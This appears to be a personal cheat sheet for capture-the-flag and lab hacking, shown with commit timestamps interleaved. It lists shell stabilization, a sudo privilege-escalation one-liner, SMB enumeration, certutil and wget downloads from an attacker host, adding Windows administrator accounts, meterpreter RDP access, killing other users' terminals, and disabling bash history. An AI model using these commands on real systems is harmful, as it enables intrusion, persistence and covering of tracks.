2020-09-22 16:39:22 +00:00
# Linux
### Stablilize Shell
2020-09-10 20:03:04 +00:00
1. ctrl+z
2. stty raw -echo
3. fg (press enter x2)
4. export TERM=xterm , for using `clear` command
2020-09-10 19:58:17 +00:00
2020-09-22 16:39:22 +00:00
### Spawn bash
2020-09-10 20:03:04 +00:00
* /usr/bin/script -qc /bin/bash 1& >/dev/null
* python -c 'import pty;pty.spawn("/bin/bash")'
* python3 -c 'import pty;pty.spawn("/bin/bash")'
2020-09-10 19:58:17 +00:00
2020-10-18 18:16:43 +00:00
### Vulnerable sudo version
`sudo -u#-1 whoami`
2020-10-25 12:41:05 +00:00
### Looking for smb shares
#### SmbClient
2020-10-25 14:00:03 +00:00
* `smbclient -L \\\\<ip\\` listing all shares
* `smbclient \\\\<ip>\\<share>` accessing a share anonymously
* `smbclient \\\\10.10.209.122\\<share> -U <share> ` accessing a share with an authorized user
2020-10-25 13:56:23 +00:00
2020-10-25 12:41:05 +00:00
#### Smbmap
2020-10-25 13:51:30 +00:00
* `smbmap -u <username> -p <password> -H <ip>`
2020-10-18 18:16:43 +00:00
2020-10-25 13:56:23 +00:00
#### Smbget
* `smbget -R smb://<ip>/<share>`
2020-09-22 16:39:22 +00:00
### Finding Binaries
2020-09-10 19:58:17 +00:00
2020-09-10 20:03:04 +00:00
* find . - perm /4000 (user id uid)
* find . -perm /2000 (group id guid)
2020-09-10 19:58:17 +00:00
2020-09-22 16:39:22 +00:00
### Changing file attributes
2020-09-10 19:58:17 +00:00
2020-09-10 20:05:19 +00:00
chattr + i filename `making file immutable` < br />
chattr -i filename `making file mutable` < br />
2020-09-10 20:04:22 +00:00
lschattr filename `Checking file attributes`
2020-09-22 16:34:15 +00:00
2020-09-28 16:13:59 +00:00
### Uploading Files
2020-09-28 16:15:10 +00:00
scp file/you/want `user@ip` :/path/to/store < br />
2020-09-28 16:14:40 +00:00
python -m SimpleHTTPServer [port] `By default will listen on 8000` < br />
2020-10-22 15:52:58 +00:00
python3 -m http.server [port] `By default will listen on 8000` < br />
2020-09-28 16:13:59 +00:00
2020-10-26 21:33:34 +00:00
### Downloading Files
wget http://< ip > :port/< file >
2020-09-22 16:43:07 +00:00
# Windows
2020-09-22 16:34:15 +00:00
### Adding User
net user "USER_NAME" "PASS" /add
### Changing User's password
net user "USER_NAME" "NEWPASS"
### Adding User to Administrators
net localgroup administrators "USER_NAME" /add
2020-09-22 16:43:07 +00:00
### Changing File Permissions
2020-09-22 16:45:03 +00:00
CACLS files /e /p {USERNAME}:{PERMISSION}< br / >
Permissions:< br / >
2020-09-22 16:44:32 +00:00
1.R `Read` < br />
2.W `Write` < br />
3.C `Change` < br />
2020-09-22 16:43:07 +00:00
4.F `Full Control`
2020-09-28 16:14:40 +00:00
2020-09-22 20:24:35 +00:00
### Set File bits
attrib +r filename `add read only bit` < br />
attrib -r filename `remove read only bit` < br />
attrib +h filename `add hidden bit ` < br />
attrib -h filename `remove hidden bit`
2020-09-28 16:14:40 +00:00
2020-09-22 20:24:35 +00:00
### Show hidden file/folder
dir /a `show all hidden files & folder` < br />
dir /a:d `show only hidden folder` < br />
dir /a:h `show only hidden files` < br />
2020-10-26 21:33:34 +00:00
### Downloading Files
certutil.exe -urlcache -f http://< ip > :< port > /< file > ouput.exe
2020-09-22 16:39:22 +00:00
2020-10-24 15:15:04 +00:00
# Msfvenom
### List All Payloads
msfvenom -l payloads
### List Payload Format
msfvenom --list formats
2020-09-24 18:50:52 +00:00
2020-10-24 15:15:04 +00:00
# Meterpreter
2020-09-24 18:50:52 +00:00
### Adding user for RDP
run getgui -u [USER_NAME] -p [PASS]
2020-09-22 16:39:22 +00:00
# King Of The Hill (KoTH)
2020-09-23 16:51:41 +00:00
### Monitoring and Closing Shell (Linux)
2020-09-22 16:39:22 +00:00
* strace `debugging / tamper with processes`
* gbd `c/c++ debugger`
* script - records terminal activites
* w /who `check current pts ,terminal device`
2020-10-22 15:51:56 +00:00
* ps -t ps/pts-number `process monitoring`
* script /dev/pts/pts-number `montior terminal`
2020-09-22 16:39:22 +00:00
* cat /dev/urandom > /dev/pts/pts-number 2>/dev/null `prints arbitary text on terminal`
* pkill -9 -t pts/pts-number
2020-10-22 15:51:56 +00:00
### Send messages to logged in users
* echo "msg" > /dev/pts/pts-number `send message to specific user` < br />
* wall msg `boradcast message to everyone` < br />
2020-09-23 16:51:41 +00:00
### Closing Session (Windows)
* quser
* logoff id|user_name
2020-10-09 12:19:57 +00:00
export HISTFILE=/dev/null found this it might help you out a little when doing KOTH it basically stops bash logging your commands in the ~/.bash_history file